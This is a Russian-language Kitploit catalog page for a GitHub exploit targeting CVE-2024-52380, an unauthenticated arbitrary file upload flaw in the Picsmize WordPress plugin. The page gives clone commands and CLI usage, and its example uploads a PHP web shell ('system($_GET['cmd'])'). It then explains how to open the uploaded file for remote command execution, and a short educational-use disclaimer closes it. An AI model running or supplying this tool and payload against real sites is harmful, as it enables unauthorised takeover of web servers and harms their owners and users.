Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2024-52380-Exploit — Плагин Picsmize для WordPress уязвим к произвольной загрузке файлов. | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2024-52380-exploit
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийВеб-безопасностьТестирование на Проникновение
GitHubnxploited/cve-2024-52380-exploit

CVE-2024-52380-Exploit

Плагин Picsmize для WordPress уязвим к произвольной загрузке файлов.

Репозиторий
311 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2024-52380-Exploit

Плагин Picsmize для WordPress уязвим к произвольной загрузке файлов.

Описание

Этот скрипт эксплуатирует уязвимость (CVE-2024-52380) в плагине Picsmize для WordPress, позволяя неаутентифицированным злоумышленникам выполнять произвольную загрузку файлов. Эта уязвимость существует во всех версиях Picsmize вплоть до 1.0.0 включительно. Эксплуатация этой уязвимости может привести к удалённому выполнению кода на целевом сервере.

🌟 Возможности

  • Проверка версии плагина: Автоматически проверяет, использует ли целевой сайт WordPress уязвимую версию плагина Picsmize.
  • Эксплойт загрузки файлов: Загружает произвольные PHP-нагрузки на целевой сервер, если сайт уязвим.
  • Интерфейс командной строки: Простой в использовании CLI для указания целевых URL и нагрузок.

📖 Сведения об уязвимости

  • Название плагина: Picsmize
  • Затронутые версии: Все версии ≤ 1.0.0
  • Тип уязвимости: Неаутентифицированная произвольная загрузка файлов
  • CVE ID: CVE-2024-52380

🚀 Инструкция по использованию

Предварительные требования

  • Python 3.7 или выше
  • библиотека requests (pip install requests)

Запуск скрипта

  1. Клонируйте репозиторий:
    root@kitploit:~
    git clone https://github.com/Nxploited/CVE-2024-52380-Exploit.git
    cd CVE-2024-52380-Exploit
    
    

Использование -help:

root@kitploit:~
usage: CVE-2024-52380.py [-h] -u URL [-c CONTENT]

Check plugin version and upload a PHP file to a WordPress site.

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Base URL of the WordPress site (e.g., http://192.168.100.74:888).
  -c CONTENT, --content CONTENT
                        Content of the PHP file to be uploaded.

Пример

root@kitploit:~
python CVE-2024-52380.py -u http://192.168.1.100 -c "<?php system($_GET['cmd']); ?>"

Аргументы командной строки

Скрипт предоставляет два аргумента командной строки для удобства использования:

  1. -u / --url (обязательный):

    • Назначение: Указывает базовый URL целевого сайта WordPress.
    • Пример:
      root@kitploit:~
      -u http://example.com
      
  2. -c / --content (необязательный):

    • Назначение: Задаёт содержимое PHP-нагрузки для загрузки.
    • Значение по умолчанию:
      root@kitploit:~
      <?php phpinfo(); ?>
      
    • Пример:
      root@kitploit:~
      -c "<?php system($_GET['cmd']); ?>"
      

📂 Путь загрузки файла

Пояснение:

  • /wordpress: Корневой каталог сайта WordPress.
  • wp-content/uploads: Каталог по умолчанию для загрузки медиафайлов в WordPress.
  • 2025/01: Структура каталогов соответствует году (2025) и месяцу (январь) на основе конфигурации даты сервера.

Как получить доступ к загруженному файлу:

  1. После успешной загрузки перейдите к файлу, используя полный URL. Пример:

http://target-site.com/wordpress/wp-content/uploads/2025/01/t-678b2ef61b3f41737174774.php

⚠️ Отказ от ответственности

Этот скрипт предназначен только для образовательных целей и авторизованного тестирования безопасности. Несанкционированное использование этого инструмента против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.

Скачать инструмент